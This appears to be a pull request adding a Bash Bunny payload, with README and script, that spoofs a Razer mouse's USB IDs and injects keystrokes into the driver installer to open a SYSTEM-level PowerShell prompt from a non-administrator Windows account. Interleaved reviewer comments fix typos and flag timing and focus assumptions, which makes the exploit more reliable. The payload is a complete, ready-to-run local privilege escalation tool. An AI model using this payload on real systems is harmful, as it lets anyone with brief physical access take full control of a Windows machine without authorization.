New Payload: Razer System Shell (#463)
Exploit Razer USA HID driver installation to System authority PowerShell. This is heavily based on a Tweet by @_MG_ on 22nd Aug 2021 but modified to work with BashBunny
pull/464/head
parent 9b86d8c991
commit 9fdacee185
@ -0,0 +1,22 @@
# Razer System Shell from Bash Bunny
Author: Emptyhen
Version: 0.1
## Description
Makes use of a exploitation that's part of the driver installation process for Razer HID devices. From a low privilege (non administrator account) this code produces a System authority PowerShell prompt.
There are some long delays built into this payload to allow for the time required to install the drivers and start the Razer Synaptics installation and configuration tool.
Although this has been designed for the Bash Bunny, it should be compatible with the Key Croc too.
Note: To run the payload a second time, the Razer driver needs to be removed from Device Manager.
## STATUS
| LED Status | Status |
|------------------------|---------------------------------------------------|
| PINK | Payload starting and configuring the attack mode. |
| ORANGE - Single Flash | Waiting for drivers to be installed. |
| ORANGE - Two Flashes | Injecting keystrokes to create the shell. |
| ORANGE - Three Flashes | Waiting for PowerShell to launch |
| GREEN | Payload finished. |
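Review bot: the Description has a wording slip and the STATUS table is slightly inconsistent. "Makes use of a exploitation that's part of the driver installation process" should read "Makes use of an exploit in the driver installation process"; both the Description and the delay note call the tool "Razer Synaptics", while Razer's configuration software is Razer Synapse (Synaptics is an unrelated vendor), so the name should be confirmed before merge. In the table, "Waiting for PowerShell to launch" lacks the trailing period the other rows have. The README should also state plainly that the "long delays" are fixed waits rather than detection of the installer window, so on a slow driver install the keystrokes land in whatever has focus; the Note about removing the driver before a second run is the right kind of detail, and a sentence on that timing assumption next to it would help users troubleshoot a failed run.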
@ -0,0 +1,40 @@
# Title: Razer System Shell
# Description: Exploit Razer USA HID driver installation to System authority PowerShell.
# This is heavily based on Tweet by @_MG_ on 22nd Aug 2021 but modified to work with BashBunny
# Author: Emptyhen
# Props: @_MG_, @Hak5Darren, @KalaniMakutu - Original Concept
Cribbit, NightGhost - Great suggestions to clean up the PoC.
# Version: 0.1
# Category: Execution
# Target: Windows 10 (Powershell)
# Attackmodes: Serial, HID
LED SETUP
# Serial isn't actually used but appears to be required to make the HID work correctly.
ATTACKMODE SERIAL HID VID_0X1532 PID_0X0064
# Long delay to allow the driver installation and wait for the Razer Synaptics to start up.
# Note this only happens after the driver is installed - to run this again, remove the Razer HID driver in Device Manager.
LED STAGE1
QUACK DELAY 40000
# Inject Keystrokes to Launch a Powershell Window.
LED STAGE2
QUACK SPACE
for run in {1..5}; do QUACK TAB; done
QUACK RIGHT
QUACK RIGHT
QUACK ENTER
QUACK DELAY 500
QUACK ALT D
QUACK STRING powershell
QUACK ENTER
# A 'nt autority\system' PowerShell prompt should get spawned.
LED STAGE3
QUACK DELAY 10000
QUACK STRING whoami
QUACK ENTER
LED FINISH
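Review bot: the credits line `Cribbit, NightGhost - Great suggestions to clean up the PoC.` has no leading `#`, so when the payload runs as a script (the `for run in {1..5}; do QUACK TAB; done` line shows it is bash) that line is executed as a command and fails with "command not found"; prefix it with `#` like the surrounding header lines. Two comment fixes: `# A 'nt autority\system' PowerShell prompt should get spawned.` misspells "authority", and `# Target: Windows 10 (Powershell)` should read "PowerShell" to match the title. The waits `QUACK DELAY 40000` and `QUACK DELAY 10000` are fixed timing assumptions rather than waits on any signal that the installer or the prompt has appeared, and the TAB/RIGHT/ENTER sequence only does what the comment says if the installer window has focus at that instant; the comments above `LED STAGE1` and `LED STAGE3` should say so explicitly, so a failed run can be attributed to timing rather than to the technique. Minor: the comment "Serial isn't actually used but appears to be required" would be more useful with the observed symptom when SERIAL is omitted, since that is what a later maintainer will test.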